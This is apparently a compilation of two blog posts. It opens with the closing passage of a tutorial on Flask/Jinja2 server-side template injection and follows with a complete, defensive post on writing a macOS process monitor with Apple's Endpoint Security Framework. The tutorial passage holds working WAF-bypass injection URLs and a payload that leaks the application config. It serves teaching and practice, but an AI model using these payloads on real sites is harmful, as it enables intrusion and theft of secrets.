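# walk from a string literal up to `object`, exactly as the payloads do
mro = ''.__class__.__mro__     # (str, object) on Python 3; longer on Python 2
root = mro[-1]                 # `object` is always the last entry in the MRO
assert root is object

# then down into every directly-loaded subclass of `object`
subclasses = root.__subclasses__()

# emulate the name-based search from the {% for %} payload: find
# warnings.catch_warnings, whose _module attribute exposes __builtins__
hits = [c for c in subclasses if 'warning' in c.__name__]
print(hits[0].__name__ if hits else 'not loaded')
```

Indexing mro[-1] and searching subclasses by name keeps the chain version-independent, whereas a fixed offset only works against the exact interpreter build it was enumerated on.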
So all we have to do is pass the underscores via another parameter and call them from our template injection. We start with calling the class attribute from request (the WAF would block the underscores):

{{request.__class__}}

Then, we remove the "." and use the |attr filter to tell the template that we are accessing one of request's attributes:

{{request|attr("__class__")}}

Next, we pipe a list of strings to the "join" filter, which sticks all of the values together; in this case it sticks "__", "class" and "__" together to create "__class__":

{{request|attr(["__","class","__"]|join)}}

We then remove one of the underscores and just multiply the single one by two; in Python, "[STRING]"*[NUMBER] will make a new string that repeats the original that many times, so "test"*3 would be equal to "testtesttest":

{{request|attr(["_"*2,"class","_"*2]|join)}}

Finally, we tell the payload to get the underscores from another parameter called "usc", and we add the underscores to that parameter. An example URL to use against our script would be:

http://localhost:1337/?name={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&usc=_

This may just return Empty, since we set an if statement that basically stated: if our rendered template is empty, then just set the output to Empty.

Moving on to the next bypass method. This one is used to bypass "[", "]" being blocked, since they are needed for the payload stated above. It is honestly just a syntax thing, but it manages to achieve the same thing without having to use any "[", "]", or "_".
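The steps above translate directly into plain Python: Jinja2's |join behaves like "".join, "_"*2 is string repetition, and obj|attr("name") resolves the same way getattr(obj, "name") does (the Dummy class here is just an illustration, not part of the Flask app):

```python
# assemble "__class__" without ever writing a double underscore literally,
# mirroring the ["_"*2,"class","_"*2]|join payload
name = "".join(["_" * 2, "class", "_" * 2])
assert name == "__class__"

class Dummy:
    pass

obj = Dummy()
# the template's request|attr(...) resolves attributes the same way getattr does
print(getattr(obj, name) is Dummy)  # True
```

Since the WAF in this scenario only inspects the "name" parameter, the underscores smuggled in via "usc" never get filtered, and join reassembles the forbidden attribute name at render time.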
Some examples are:

http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_

http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_

These were pulled from an amazing page called "PayloadsAllTheThings"; the link can be found at the bottom of the article in the sources part.

Another one, in case "." is blocked, uses the Jinja2 |attr() filter:

http://localhost:1337/?name={{request|attr(["_"*2,"class","_"*2]|join)}}

Finally, a bypass method that is used in case "[", "]", "|join" and/or "_" is blocked, since it uses none of the previously stated characters:

http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_

Now these are just the base bypass payloads, but they can be combined and manipulated to achieve some amazing things. Here is a payload I made myself that leaks the config:

{{request|attr(["url",request.args.usc,"for.",request.args.usc*2,request.args.1,request.args.usc*2,".current",request.args.usc,"app.",request.args.conf]|join)}}&1=globals&usc=_&link=url&conf=config

Conclusion:

This has just been a basic explanation of how to set up a website vulnerable to SSTI, how the exploitation works, and some basic bypass methods for any WAFs that you may encounter. I would also like to shout out a moderator from HackTheBox called "makelaris", since he was actually the one who sparked my interest in SSTIs and has taught me a lot about them. If this post is enjoyed and appreciated I will make more about more advanced SSTI exploitation cases, and also how SSTIs may work and be exploited in other template engines.
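The |format bypass in the last URL is worth unpacking: Jinja2's format filter applies printf-style substitution, so the "f" parameter carries a %s template and the four copies of "a" supply the underscores. In plain Python:

```python
# the f=%s%sclass%s%s parameter is a printf-style template; filling its four
# %s slots with "_" (from the &a=_ parameter) rebuilds "__class__" without
# using "[", "]", "|join" or a literal "_" in the filtered parameter
template = "%s%sclass%s%s"
built = template % ("_", "_", "_", "_")
print(built)  # __class__
```

Because the forbidden characters only ever appear in parameters the WAF does not inspect, the filter sees nothing to block, yet the rendered template still receives the full attribute name.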
Sources:

PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md

pequalsnp-team: https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti

A good HackTheBox retired machine that has an SSTI step: Oz (https://www.hackthebox.eu/home/machines/profile/152)

A writeup for the Oz machine: https://0xdf.gitlab.io/2019/01/12/htb-oz.html

More exploring SSTIs: https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html

Orange's disclosed bug bounty report from Uber: https://hackerone.com/reports/125980

Source: https://0x00sec.org/t/explaining-server-side-template-injections/16297
  10. Writing a Process Monitor with Apple's Endpoint Security Framework

September 7, 2019

# ./processMonitor
Starting process monitor...[ok]

PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC')
pid: 7655
path: /bin/ls
uid: 501
args: (
    ls,
    "-lart",
    "."
)
signing info: {
    cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850;
    csFlags = 603996161;
    isPlatformBinary = 1 (true);
    signatureIdentifier = "com.apple.ls";
}

On github: Process Monitoring Library

Background

A common component of (many) security tools is a process monitor. As its name implies, a process monitor watches for the creation of new processes (plus extracts information such as process id, path, arguments, and code-signing information).

Many of my Objective-See tools track process creations. Examples include:

Ransomwhere?
Tracks process creations to classify processes (as belonging to the OS/Apple, from 3rd-party developers, etc.) such that if a process begins rapidly encrypting files, Ransomwhere? can quickly determine if this encryption is legitimate or possibly ransomware.

TaskExplorer
Tracks process creations (and terminations) in order to display a real-time list of active processes to the user.

BlockBlock
Tracks process creations to map process identifiers (pids) reported in persistent file events to full process paths, in order to provide more informative alerts to users when persistence events occur.

After a while I got tired of including duplicative process monitoring code in each project, so I decided to write a process monitoring library. Now, any tool that is interested in tracking process events can simply link against this library.
The source code for this (original) process monitoring library can be found on Objective-See's github page: Proc Info

Until now, the preferred way to programmatically create a process monitor was to subscribe to events from Apple's OpenBSM subsystem. For a deep-dive into the OpenBSM subsystem, check out my ShmooCon talk: "Get Cozy with OpenBSM Auditing"

Though sufficient, the OpenBSM subsystem is rather painful to programmatically interface with. For starters, it requires one to parse and tokenize various (binary) audit records and audit tokens (that amongst other things contain process-related events):

//init (remaining) balance to record's total length
recordBalance = recordLength;

//init processed length to start (zer0)
processedLength = 0;

//parse record
// read all tokens/process
while(0 != recordBalance)
{
    //extract token
    // and sanity check
    if(-1 == au_fetch_tok(&tokenStruct, recordBuffer + processedLength, recordBalance))
    {
        //error
        // skip record
        break;
    }

    //now parse tokens
    // looking for those that are related to process start/terminated events

    //add length of current token
    processedLength += tokenStruct.len;

    //subtract length of current token
    recordBalance -= tokenStruct.len;
}

Moreover, the audit events delivered by the OpenBSM subsystem do not contain information about the processes' code-signing identities. Thus, once you receive an audit event related to process creation, if you want to know, for example, whether said process is signed by Apple proper, you have to write extra code to programmatically extract this information. This is relatively non-trivial and may be computationally (CPU) intensive.

Finally, the OpenBSM audit subsystem (by design) is reactive, meaning that by the time you've received the events (i.e. process creation) it's already occurred.
This runs the gamut from being mildly annoying (for example, a short-lived process may have already exited, meaning you cannot query it to retrieve its code-signing identity) to, well, rather problematic. For example, if you're writing a security tool, clearly there exist many scenarios where being proactive about process events would be ideal (i.e. blocking a piece of malware before it's allowed to execute). Until now, the only way to realize proactive security protections was to live in the kernel (something that Apple is rather drastically deprecating).

Apple's Endpoint Security Framework

With Apple's push to kick 3rd-party developers (including security products) out of the kernel, coupled with the realization (finally!) that the existing subsystems were rather archaic and dated, Apple recently announced the new, user-mode "Endpoint Security Framework" (that provides a user-mode interface to a new "Endpoint Security Subsystem"). As we'll see, this framework addresses many of the aforementioned issues & shortcomings. Specifically it provides:

a well-defined and (relatively) simple API

comprehensive process code-signing information for events

the ability to proactively respond to process events (though here, our process monitor will be passive)

I'm often somewhat critical of Apple's security posture (or lack thereof). However, the "Endpoint Security Framework" is potentially a game-changer for those of us seeking to write robust user-mode security tools for macOS. Mahalo Apple! Personally I'm stoked 🥳

This blog is a practical walk-thru of creating a process monitor which leverages Apple's new framework. For more information on the Endpoint Security Framework, see Apple's developer documentation: Endpoint Security Framework

In this blog, we'll illustrate exactly how to create a comprehensive user-mode process monitor that leverages Apple's new framework.
There are a few prerequisites to leverage the Endpoint Security Framework:

The com.apple.developer.endpoint-security.client entitlement
This can be requested from Apple via this link. Until then (I'm still waiting 😅), give yourself that entitlement (i.e. sign your code with an entitlements file containing it, and disable SIP such that it remains pseudo-unenforced):

<dict>
    <key>com.apple.developer.endpoint-security.client</key>
    <true/>
</dict>

Xcode 11/macOS 10.15 SDK
As these are both (still) in beta, for now it's recommended to perform development in a virtual machine (running macOS 10.15, beta).

macOS 10.15 (Catalina)
It appears the Endpoint Security Framework will not be made available to older versions of macOS. As such, any tools that leverage this framework will only run on 10.15 or newer.

Ok enough chit-chat, let's dive in!

Our goal is simple: create a comprehensive user-mode process monitor that leverages Apple's new "Endpoint Security Framework". Besides "capturing" process events, we're also interested in:

the process id (pid)
the process path
any process arguments
any process code-signing information

…luckily, unlike the OpenBSM subsystem, the new Endpoint Security Framework makes this a breeze!

Besides Apple's documentation, the "Endpoint Security Demo" on github, by a developer named Omar Ikram, was hugely helpful! Thanks Omar! 🙏

In order to subscribe to events from the "Endpoint Security Subsystem", we must first create a new "Endpoint Security" client. The es_new_client function provides the interface to perform this action.

Various (well commented!) header files in the usr/include/EndpointSecurity/ directory (such as ESClient.h) are also great resources.
$ ls /Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/usr/include/EndpointSecurity/
ESClient.h  ESMessage.h  ESOpaqueTypes.h  ESTypes.h  EndpointSecurity.h

$ less EndpointSecurity/ESClient.h

struct es_client_s;

/**
 * es_client_t is an opaque type that stores the endpoint security client state
 */
typedef struct es_client_s es_client_t;

/**
 * Initialise a new es_client_t and connect to the ES subsystem
 * @param client Out param. On success this will be set to point to the newly allocated es_client_t.
 * @param handler The handler block that will be run on all messages sent to this client
 * @return es_new_client_result_t indicating success or a specific error.
 */

In code, we first include the EndpointSecurity.h file, declare a global variable (type: es_client_t*), then invoke the es_new_client function:

#import <EndpointSecurity/EndpointSecurity.h>

//(global) endpoint client
es_client_t* endpointClient = nil;

//create client
// callback invokes (user) callback for new processes
result = es_new_client(&endpointClient, ^(es_client_t *client, const es_message_t *message)
{
    //process events

});

//error?
if(ES_NEW_CLIENT_RESULT_SUCCESS != result)
{
    //err msg
    NSLog(@"ERROR: es_new_client() failed with %d", result);

    //bail
    goto bail;
}

Note that the es_new_client function takes an (out) pointer to a variable of type es_client_t. Once the function returns, this variable will hold the initialized endpoint security client (required by all other endpoint security APIs). The second parameter of the es_new_client function is a block that will be automatically invoked on endpoint security events (more on this shortly!)

The es_new_client function returns a variable of type es_new_client_result_t.
Peeking at ESTypes.h reveals the possible values for this variable:

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h

/**
 * @brief Error conditions for creating a new client
 */
typedef enum {
    ES_NEW_CLIENT_RESULT_SUCCESS,

    ///One or more invalid arguments were provided
    ES_NEW_CLIENT_RESULT_ERR_INVALID_ARGUMENT,

    ///Communication with the ES subsystem failed
    ES_NEW_CLIENT_RESULT_ERR_INTERNAL,

    ///The caller is not properly entitled to connect
    ES_NEW_CLIENT_RESULT_ERR_NOT_ENTITLED,

    ///The caller is not permitted to connect. They lack Transparency, Consent, and Control (TCC) approval from the user.
    ES_NEW_CLIENT_RESULT_ERR_NOT_PERMITTED
} es_new_client_result_t;

Hopefully these are rather self-explanatory (i.e. ES_NEW_CLIENT_RESULT_SUCCESS means ok! while ES_NEW_CLIENT_RESULT_ERR_NOT_ENTITLED means you don't hold the com.apple.developer.endpoint-security.client entitlement). If all is well, the es_new_client function will return ES_NEW_CLIENT_RESULT_SUCCESS, indicating that it has created a newly initialized Endpoint Security client (es_client_t) for us to use.

To compile the above code, link against the Endpoint Security Framework (libEndpointSecurity)

Once we've created an instance of an es_client_t, we must now tell the Endpoint Security Subsystem what events we are interested in (or want to "subscribe to", in Apple parlance).
This is accomplished via the es_subscribe function (documented here and in the ESClient.h header file):

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESClient.h

/**
 * Subscribe to some set of events
 * @param client The client that will be subscribing
 * @param events Array of es_event_type_t to subscribe to
 * @param event_count Count of es_event_type_t in `events`
 * @return es_return_t indicating success or error
 * @note Subscribing to new event types does not remove previous subscriptions
 */
OS_EXPORT
API_AVAILABLE(macos(10.15)) API_UNAVAILABLE(ios, tvos, watchos)
es_return_t
es_subscribe(es_client_t * _Nonnull client, es_event_type_t * _Nonnull events, uint32_t event_count);

This function takes the initialized endpoint client (returned by the es_new_client function), an array of events of interest, and the size of said array:

//(process) events of interest
es_event_type_t events[] = {
    ES_EVENT_TYPE_NOTIFY_EXEC,
    ES_EVENT_TYPE_NOTIFY_FORK,
    ES_EVENT_TYPE_NOTIFY_EXIT
};

//subscribe to events
if(ES_RETURN_SUCCESS != es_subscribe(endpointClient, events, sizeof(events)/sizeof(events[0])))
{
    //err msg
    NSLog(@"ERROR: es_subscribe() failed");

    //bail
    goto bail;
}

The events of interest depend on, well, what events are of interest to you!
As we're writing a process monitor, we're (only) interested in the following three process-related events:

ES_EVENT_TYPE_NOTIFY_EXEC
"A type that represents process execution notification events."

ES_EVENT_TYPE_NOTIFY_FORK
"A type that represents process forking notification events."

ES_EVENT_TYPE_NOTIFY_EXIT
"A type that represents process exit notification events."

For a full list of events that one may subscribe to, take a look at the es_event_type_t enum in the ESTypes.h header file:

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h

/**
 * @brief The valid event types recognized by EndpointSecurity
 */
typedef enum {
    ES_EVENT_TYPE_AUTH_EXEC,
    ES_EVENT_TYPE_AUTH_OPEN,
    ES_EVENT_TYPE_AUTH_KEXTLOAD,
    ES_EVENT_TYPE_AUTH_MMAP,
    ES_EVENT_TYPE_AUTH_MPROTECT,
    ES_EVENT_TYPE_AUTH_MOUNT,
    ES_EVENT_TYPE_AUTH_RENAME,
    ES_EVENT_TYPE_AUTH_SIGNAL,
    ES_EVENT_TYPE_AUTH_UNLINK,
    ES_EVENT_TYPE_NOTIFY_EXEC,
    ES_EVENT_TYPE_NOTIFY_OPEN,
    ES_EVENT_TYPE_NOTIFY_FORK,
    ES_EVENT_TYPE_NOTIFY_CLOSE,
    ES_EVENT_TYPE_NOTIFY_CREATE,
    ES_EVENT_TYPE_NOTIFY_EXCHANGEDATA,
    ES_EVENT_TYPE_NOTIFY_EXIT,
    ES_EVENT_TYPE_NOTIFY_GET_TASK,
    ES_EVENT_TYPE_NOTIFY_KEXTLOAD,
    ES_EVENT_TYPE_NOTIFY_KEXTUNLOAD,
    ES_EVENT_TYPE_NOTIFY_LINK,
    ES_EVENT_TYPE_NOTIFY_MMAP,
    ES_EVENT_TYPE_NOTIFY_MPROTECT,
    ES_EVENT_TYPE_NOTIFY_MOUNT,
    ES_EVENT_TYPE_NOTIFY_UNMOUNT,
    ES_EVENT_TYPE_NOTIFY_IOKIT_OPEN,
    ES_EVENT_TYPE_NOTIFY_RENAME,
    ES_EVENT_TYPE_NOTIFY_SETATTRLIST,
    ES_EVENT_TYPE_NOTIFY_SETEXTATTR,
    ES_EVENT_TYPE_NOTIFY_SETFLAGS,
    ES_EVENT_TYPE_NOTIFY_SETMODE,
    ES_EVENT_TYPE_NOTIFY_SETOWNER,
    ES_EVENT_TYPE_NOTIFY_SIGNAL,
    ES_EVENT_TYPE_NOTIFY_UNLINK,
    ES_EVENT_TYPE_NOTIFY_WRITE,
    ES_EVENT_TYPE_AUTH_FILE_PROVIDER_MATERIALIZE,
    ES_EVENT_TYPE_NOTIFY_FILE_PROVIDER_MATERIALIZE,
    ES_EVENT_TYPE_AUTH_FILE_PROVIDER_UPDATE,
    ES_EVENT_TYPE_NOTIFY_FILE_PROVIDER_UPDATE,
    ES_EVENT_TYPE_AUTH_READLINK,
    ES_EVENT_TYPE_NOTIFY_READLINK,
    ES_EVENT_TYPE_AUTH_TRUNCATE,
    ES_EVENT_TYPE_NOTIFY_TRUNCATE,
    ES_EVENT_TYPE_AUTH_LINK,
    ES_EVENT_TYPE_NOTIFY_LOOKUP,
    ES_EVENT_TYPE_LAST
} es_event_type_t;

Note there are two main event types: ES_EVENT_TYPE_AUTH_* and ES_EVENT_TYPE_NOTIFY_*

ES_EVENT_TYPE_AUTH_*
Events that require a response before being allowed to proceed. For example, ES_EVENT_TYPE_AUTH_EXEC will block a process execution until the subscriber (i.e. your security tool) provides a response.

ES_EVENT_TYPE_NOTIFY_*
Events that simply notify the subscriber (e.g. they do not require a response before being allowed to proceed). For example, the ES_EVENT_TYPE_NOTIFY_EXEC event simply notifies one that a process is (about to) execute.

In our process monitor, we only utilize ES_EVENT_TYPE_NOTIFY_* events. These events are also succinctly described in Apple's documentation for the es_event_type_t enumeration.

Once the es_subscribe function successfully returns (ES_RETURN_SUCCESS), the Endpoint Security Subsystem will start delivering events.

Event/Message Delivery

We (just) discussed how to subscribe to events from the Endpoint Security Subsystem by invoking:

the es_new_client function
the es_subscribe function

Of course, we'll want to add some logic/code to process received messages. Recall that the final argument of the es_new_client function is a callback block (or handler). Apple states: "The handler block…will be run on all messages sent to this client."

The block is invoked with the endpoint client and, most importantly, the message from the Endpoint Security Subsystem. This message variable is a pointer of type es_message_t (i.e. es_message_t*). Apple adequately "documents" the es_message_t structure in the (aptly named) ESMessage.h file, and also online.
$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h

/**
 * es_message_t is the top level datatype that encodes information sent from the ES subsystem to its clients
 * Each security event being processed by the ES subsystem will be encoded in an es_message_t
 * A message can be an authorization request or a notification of an event that has already taken place
 * The action_type indicates if the action field is an auth or notify action
 * The event_type indicates which event struct is defined in the event union.
 */
typedef struct {
    uint32_t version;
    struct timespec time;
    uint64_t mach_time;
    uint64_t deadline;
    es_process_t * _Nullable process;
    uint8_t reserved[8];
    es_action_type_t action_type;
    union {
        es_event_id_t auth;
        es_result_t notify;
    } action;
    es_event_type_t event_type;
    es_events_t event;
    uint64_t opaque[]; /* Opaque data that must not be accessed directly */
} es_message_t;

Notable members of interest include:

es_process_t * process
A pointer to a structure that describes the process responsible for the event.

es_event_type_t event_type
The type of event (that will match one of the events we subscribed to, e.g. ES_EVENT_TYPE_NOTIFY_EXEC)

es_events_t event
An event-specific structure (i.e. es_event_exec_t exec)

Since we only subscribed to three events (ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_FORK, and ES_EVENT_TYPE_NOTIFY_EXIT), processing the received messages is fairly straightforward. For each of these three events, we are interested in extracting a pointer to an es_process_t which will hold the information about the process (starting, forking, or terminating).

Recall the es_message_t structure received in the es_new_client callback contains a member: es_process_t * process (message->process). However, as noted, this is the process responsible for the action, which might not always be the es_process_t * we're actually interested in. Huh?
In the case of a process exec (ES_EVENT_TYPE_NOTIFY_EXEC) event, message->process will describe the process that is responsible for spawning the process; in other words, the parent. We are actually interested in the child, that is, the process that is about to be (or just was) spawned.

For example, if we hop into a terminal and run the ls command, message->process points to the shell process (/bin/zsh). This of course is the parent: the process responsible for executing /bin/ls:

(lldb) p message->process.executable.path
(es_string_token_t) $17 = (length = 8, data = "/bin/zsh")

So how do we 'find' the es_process_t * that points to the child process (/bin/ls)? Recall the message structure contains a member named event_type. In the case of a process exec, this will be set to ES_EVENT_TYPE_NOTIFY_EXEC and message->event will point to an es_event_exec_t structure (defined in ESMessage.h):

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h

typedef struct {
    es_process_t * _Nullable target;
    es_token_t args;
    uint8_t reserved[64];
} es_event_exec_t;

The target member of this structure contains a pointer to the es_process_t we're interested in (i.e. the one that describes /bin/ls):

(lldb) p message->event.exec.target->executable.path
(es_string_token_t) $16 = (length = 7, data = "/bin/ls")

What about the other two events we've subscribed to? For ES_EVENT_TYPE_NOTIFY_FORK events, the message contains an event of type es_event_fork_t, which contains information about the child process in es_process_t * child. For ES_EVENT_TYPE_NOTIFY_EXIT events, we can simply use message->process (as the process that's generating the exit event is the process we're interested in…that is to say, the process that's about to exit).
If you're comfortable reading code, the following should now make sense:

//process of interest
es_process_t* process = NULL;

//set type
// extract (relevant) process object, etc
switch(message->event_type) {

    //exec
    case ES_EVENT_TYPE_NOTIFY_EXEC:
        process = message->event.exec.target;
        break;

    //fork
    case ES_EVENT_TYPE_NOTIFY_FORK:
        process = message->event.fork.child;
        break;

    //exit
    case ES_EVENT_TYPE_NOTIFY_EXIT:
        process = message->process;
        break;
}

Now we (finally) have a pointer to the (relevant) es_process_t process structure. The definition for this structure can be found in the ESMessage.h header file:

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h
...
/**
 * @brief describes a process that took the action being described in an es_message_t
 * For exec events also describes the newly executing process
 */
typedef struct {
    audit_token_t audit_token;
    pid_t ppid;
    pid_t original_ppid;
    pid_t group_id;
    pid_t session_id;
    uint32_t codesigning_flags;
    bool is_platform_binary;
    bool is_es_client;
    uint8_t cdhash[CS_CDHASH_LEN];
    es_string_token_t signing_id;
    es_string_token_t team_id;
    es_file_t * _Nullable executable;
} es_process_t;

The es_process_t structure is also documented by Apple as part of its Endpoint Security Subsystem developer documentation.

Let's discuss various fields in the structure, as they'll be relevant for the process monitor we're building. First, we're interested in extracting the process id (pid) from this structure. Though the es_process_t doesn't directly contain a process pid, it does contain an audit token (type: audit_token_t). In the ESMessage.h header file, Apple states that "values such as PID, UID, GID, etc.
can be extracted from the audit token via API in libbsm.h." Specifically, we can invoke audit_token_to_pid (passing in the audit_token member of the es_process_t structure):

//extract pid
pid_t pid = audit_token_to_pid(process->audit_token);

Of course, we're also interested in the path to the process's executable. This is found within the executable member of the es_process_t structure. The executable member is a pointer to an es_file_t structure:

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h
...
/**
 * es_file_t provides the inode/devno and path to a file that relates to a security event
 * the path may be truncated, which is indicated by the path_truncated flag.
 */
typedef struct {
    es_string_token_t path;
    bool path_truncated;
    union {
        dev_t devno;
        fsid_t fsid;
    };
    ino64_t inode;
} es_file_t;

The path to the process's executable is found in the path member of the es_file_t structure (&process->executable->path). Its type is es_string_token_t (defined in ESTypes.h):

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESTypes.h

/**
 * @brief Structure for handling packed blobs of serialized data
 */
typedef struct {
    size_t length;
    const char * data;
} es_string_token_t;

We can convert this to a more "friendly" data type such as an NSString via the following code snippet:

//convert to data, then to string
NSString* string = [NSString stringWithUTF8String:[[NSData dataWithBytes:stringToken->data length:stringToken->length] bytes]];

If the process event is an ES_EVENT_TYPE_NOTIFY_EXEC, the message->event member points to an es_event_exec_t structure, which contains the process's arguments (es_event_exec_t->args):

$ less MacOSX10.15.sdk/usr/include/EndpointSecurity/ESMessage.h
...
/**
 * Arguments and environment variables are packed, use the following functions to operate on this field:
 * `es_exec_env`, `es_exec_arg`, `es_exec_env_count`, and `es_exec_arg_count`
 */
typedef struct {
    es_process_t * _Nullable target;
    es_token_t args;
    uint8_t reserved[64];
} es_event_exec_t;

As noted in the comments within the ESMessage.h header file, the arguments are packed. The following helper method (which utilizes es_exec_arg_count and es_exec_arg) unpacks all arguments into an array:

//extract/format args
-(void)extractArgs:(es_events_t *)event
{
    //number of args
    uint32_t count = 0;

    //argument
    NSString* argument = nil;

    //get # of args
    count = es_exec_arg_count(&event->exec);
    if(0 == count)
    {
        //bail
        goto bail;
    }

    //extract all args
    for(uint32_t i = 0; i < count; i++)
    {
        //current arg
        es_string_token_t currentArg = {0};

        //extract current arg
        currentArg = es_exec_arg(&event->exec, i);

        //convert argument (es_string_token_t) to string
        argument = convertStringToken(&currentArg);
        if(nil != argument)
        {
            //append
            [self.arguments addObject:argument];
        }
    }

bail:

    return;
}

Once we've extracted the process's identifier (pid), path, and arguments, all that's left is the code signing information.
This is pretty trivial, as such code signing information is directly embedded in the es_process_t structure:

code signing flags: (uint32_t) process->codesigning_flags
These are "standard" macOS code-signing flags, found in the cs_blobs.h file

code signing id: (es_string_token_t) process->signing_id
This is "the identifier used to sign the process."

team id: (es_string_token_t) process->team_id
This is "the team identifier used to sign the process."

cdHash: (uint8_t array[CS_CDHASH_LEN]) process->cdhash
This is "the code directory hash value"

Below is some (well-commented) code that extracts and formats code-signing information from the es_process_t structure into an (NS)dictionary:

//extract/format signing info
-(void)extractSigningInfo:(es_process_t *)process
{
    //cd hash
    NSMutableString* cdHash = nil;

    //signing id
    NSString* signingID = nil;

    //team id
    NSString* teamID = nil;

    //alloc string for hash
    cdHash = [NSMutableString string];

    //add flags
    self.signingInfo[KEY_SIGNATURE_FLAGS] =
        [NSNumber numberWithUnsignedInt:process->codesigning_flags];

    //convert/add signing id
    signingID = convertStringToken(&process->signing_id);
    if(nil != signingID)
    {
        //add
        self.signingInfo[KEY_SIGNATURE_IDENTIFIER] = signingID;
    }

    //convert/add team id
    teamID = convertStringToken(&process->team_id);
    if(nil != teamID)
    {
        //add
        self.signingInfo[KEY_SIGNATURE_TEAM_IDENTIFIER] = teamID;
    }

    //add platform binary
    self.signingInfo[KEY_SIGNATURE_PLATFORM_BINARY] =
        [NSNumber numberWithBool:process->is_platform_binary];

    //format cdhash
    for(uint32_t i = 0; i < CS_CDHASH_LEN; i++)
    {
        //append
        [cdHash appendFormat:@"%X", process->cdhash[i]];
    }

    //add cdhash
    self.signingInfo[KEY_SIGNATURE_CDHASH] = cdHash;

    return;
}

Although we're generally more interested in process creation events, we might also want to track process termination events (ES_EVENT_TYPE_NOTIFY_EXIT).
When an ES_EVENT_TYPE_NOTIFY_EXIT event is delivered, message->event will point to a structure of type es_event_exit_t:

typedef struct {
    int stat;
    uint8_t reserved[64];
} es_event_exit_t;

From this structure, we can extract the process's exit code (via the stat member):

//grab process's exit code
int exitCode = message->event.exit.stat;

Process Monitor Library

As noted, many of Objective-See's tools track process creations, and thus currently utilize my original process monitoring library: Proc Info. This library leverages Apple's OpenBSM subsystem in order to provide process events. As we previously discussed, there are several complexities and limitations of the OpenBSM subsystem (most notably, process events from the subsystem do not include code-signing information).

Lucky us, as shown in this blog, we can now leverage Apple's Endpoint Security Subsystem to effectively and comprehensively monitor process events (from user-mode!). As such, today, I'm releasing an open-source process monitoring library that implements everything we've discussed here today 🥳

On github: Process Monitoring Library

It's fairly simple to leverage this library in your own (non-commercial) tools:

Build the library, libProcessMonitor.a

Add the library and its header file (ProcessMonitor.h) to your project:
#import "ProcessMonitor.h"
As shown above, you'll also have to link against the libbsm (for audit_token_to_pid) and libEndpointSecurity libraries.

Add the com.apple.developer.endpoint-security.client entitlement to your project.

Write some code to interface with the library!

This final step involves instantiating a ProcessMonitor object and invoking the start method (passing in a callback block that's invoked on process events).
Below is some sample code that implements this logic:

//init monitor
ProcessMonitor* procMon = [[ProcessMonitor alloc] init];

//define block
// automatically invoked upon process events
ProcessCallbackBlock block = ^(Process* process)
{
    switch(process.event)
    {
        //exec
        case ES_EVENT_TYPE_NOTIFY_EXEC:
            NSLog(@"PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC')");
            break;

        //fork
        case ES_EVENT_TYPE_NOTIFY_FORK:
            NSLog(@"PROCESS FORK ('ES_EVENT_TYPE_NOTIFY_FORK')");
            break;

        //exit
        case ES_EVENT_TYPE_NOTIFY_EXIT:
            NSLog(@"PROCESS EXIT ('ES_EVENT_TYPE_NOTIFY_EXIT')");
            break;

        default:
            break;
    }

    //print process info
    NSLog(@"%@", process);
};

//start monitoring
// pass in block for events
[procMon start:block];

//run loop
// as don't want to exit
[[NSRunLoop currentRunLoop] run];

Once the [procMon start:block]; method has been invoked, the Process Monitoring library will automatically invoke the callback (block) on process events, returning a Process object. The Process object is declared in the library's header file, ProcessMonitor.h. This object contains information about the process (responsible for the event), including:

pid
path
ancestors
signing info
...and more!

Take a peek at the ProcessMonitor.h file for more details. Once compiled, we're ready to start monitoring for process events! Here, for example, we run ls -lart .

# ./processMonitor
...
PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC')
pid: 7655
path: /bin/ls
uid: 501
args: (
    ls,
    "-lart",
    "."
)
ancestors: (
    6818,
    6817,
    338,
    1
)
signing info: {
    cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850;
    csFlags = 603996161;
    isPlatformBinary = 1 (true);
    signatureIdentifier = "com.apple.ls";
}

PROCESS EXIT ('ES_EVENT_TYPE_NOTIFY_EXIT')
pid: 7655
path: /bin/ls
uid: 501
signing info: {
    cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850;
    csFlags = 603996161;
    isPlatformBinary = 1;
    signatureIdentifier = "com.apple.ls";
}
exit code: 0

Once I receive the com.apple.developer.endpoint-security.client entitlement from Apple, I'll release this pre-built binary (that links against the "Process Monitor" framework)!

Conclusion
Previously, writing a (user-mode) process monitor for macOS was not a trivial task. Thanks to Apple's new Endpoint Security Subsystem/Framework (on macOS 10.15+), it's now a breeze! In short, one simply invokes the es_new_client & es_subscribe functions to subscribe to events of interest (recalling that the com.apple.developer.endpoint-security.client entitlement is required). For a process monitor, we illustrated how to subscribe to the three process-related events:

ES_EVENT_TYPE_NOTIFY_EXEC
ES_EVENT_TYPE_NOTIFY_FORK
ES_EVENT_TYPE_NOTIFY_EXIT

We then showed how to extract the relevant es_process_t process structure and then parse out all relevant process meta-data such as process identifier, path, arguments, and code-signing information. Finally, we discussed an open-source process monitoring library that implements everything we've discussed here today. 🥳

❤️ Love these blog posts and/or want to support my research and tools? You can support them via my Patreon page!

